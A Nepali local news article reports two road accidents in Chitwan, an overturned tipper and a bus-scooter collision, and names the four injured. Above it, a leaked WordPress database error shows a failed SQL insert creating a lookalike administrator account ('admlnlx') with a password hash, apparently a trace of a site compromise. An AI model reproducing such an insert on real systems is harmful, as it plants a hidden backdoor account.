WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzdVqyvsz8ngqUjcs9LNYTNkzVT6w4/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 08:24:54', '', 'admlnlx', 'admlnlx')
चितवन, माघ १०–
चितवनमा आईतबार भएको छुट्टाछुट्टै दुर्घटनामा चार जना घाईते भएका छन् ।
जिल्लाको राप्ति नगरपालिका–१ लोथर र महादेबटार स्थित पूर्व पश्चिम लोक मार्गमा पूर्वबाट पश्चिम तर्फ आउँदै गरेको ना ४ ख ८२ नम्बरको ट्रिपर आफै अनियन्त्रित भई पल्टिदा सवार दुई जना घाईते भएका छन् । ईस्पिङको पट्टा भाचिन गई आफै अनियन्त्रित भई सडकमा पल्टिदा ट्रिपरका चालक मकवानपुर मनहरि–२ बस्ने वर्ष ३३ का भिमकुमार स्याङताङ र सहचालक मकवानपुर सोनाचुलि–२ बस्ने वर्ष १६ का लक्ष्मण मोक्ता
यस्तै आजै जिल्लाको भरतपुर उपमहानगरपालिका–१ लिला चोक स्थित रूपन्देहीबाट देवघाट जादै गरेको लु.१ ख ७१६३ नम्बरको बस र सोही दिशा तर्फ गईरहेको ना२६ प १३७६ नम्बरको स्कुटी एकआपसमा ठोक्किदा दुई जना घाईते भएका छन् ।
प्रहरीले बस चालक नवलपरासी सुनवल–१ बस्ने वर्ष २५ को बलीराम कुवँरलाई नियन्त्रणमा लिएको छ । स्कुटी चालक भरतपुर उपमहानगरपालिका– १० बस्ने वर्ष ५९ को श्रीराम श्रेष्ठ र पछाडी बसेकी वर्ष २३ कि शर्मिला श्रेष्ठ घाईते भएका छन् । घाईते चालक श्रेष्ठको अवस्था गम्भिर रहेको छ । चितवन मेडिकल कलेजमा उपचार हुन नकसेपछि उनलाई थप उपचारका लागि बिएण्डबी हस्पिटल काठमाडौं लगिएको जिल्ला प्रहरी कार्यालय चितवनले जनाएको छ ।